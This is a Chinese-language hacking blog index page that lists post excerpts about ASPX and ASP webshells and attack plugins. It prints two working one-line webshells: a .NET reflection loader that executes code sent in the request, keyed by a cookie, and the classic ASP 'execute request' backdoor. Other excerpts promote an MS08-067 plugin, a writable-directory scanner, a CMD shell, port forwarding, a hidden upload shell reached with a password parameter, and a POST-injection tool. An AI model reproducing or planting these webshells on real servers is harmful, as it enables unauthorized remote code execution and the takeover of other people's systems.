鬼仔's Blog

作者：cnqing

ASPXshell MS08-067插件
感谢hi群众兄测试，附赠几个插件。。。
1.扫可写目录插件
使用方法：设置扫描起始目录，设置扫描成功N个后停止，扫描。
阅读全文 »

鬼仔注：刚从外面回来，看到cnqing在gtalk上给我的留言，只扔给一个链接。

作者：cnqing

软件说明：
程序包 包括一个基于反射的.net 一句话木马。

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »

作者：cnqing

ScanWriterable.aspx

<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>ScanWrtieable</title>
</head>
<body>
 阅读全文 »

作者：凋零玫瑰

今天遇到一个iis只支持aspx的,禁用了asp,服务器装了mysql odbc驱动,想在那个iis上操作另一个服务器的mysql,可没现成的aspx操作mysql的程序,找了一下午,在msdn上找到个.net的sqldatasource类可以操作.
测试成功了,留在这里备忘一下.
阅读全文 »

软件作者：kj021320
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注意：本文章首发http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx，后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。

首先回顾一下以前ASP一句话的经典木马吧！

<%if request("nonamed")<>"" then execute request("nonamed")%>

VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的！网上也有例子我就不多说了！…..

然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了！
阅读全文 »

来源：BIN-Blog

写了一个WEB版的POST工具,可以向内网提交数据,其实在POST注入的时候发挥一定的效果!主要增加了对HTTP_X_FORWARDED_FOR 这个值的自定义提交.看着玩吧!
阅读全文 »

来源：BIN-Blog

最近看见网上有人发了一个DIY.ASP的.net的版本，毕竟aspx的语法要求相对严谨，尽量减少代码的数量。
我也发一个上传的东东。其实可以完全做成C/S版的，不过感觉没什么必要。可以自定义文件名，用参数访问达到隐蔽的效果。没有做异常处理!
提示：访问的格式为 xxx.aspx?pass=bin
阅读全文 »

[文章作者]寂寞hacker
[信息来源]邪恶八进制信息安全团队(http://forum.eviloctal.com)

要做毕业设计了,学校难得一次的批准了我们能够上网….不过2MB的速度,,,实在是…昨晚搞站的时候diy.asp被杀毒干掉了!网站支持ASPX,,今天早上顺手写了个扔上来!本机测试正常,如有BUG请告知!不甚感激!
想当初偶也是用着diy.asp很久,有点感情了!弄个他的c#版本,怀念一下!

以下为源码
阅读全文 »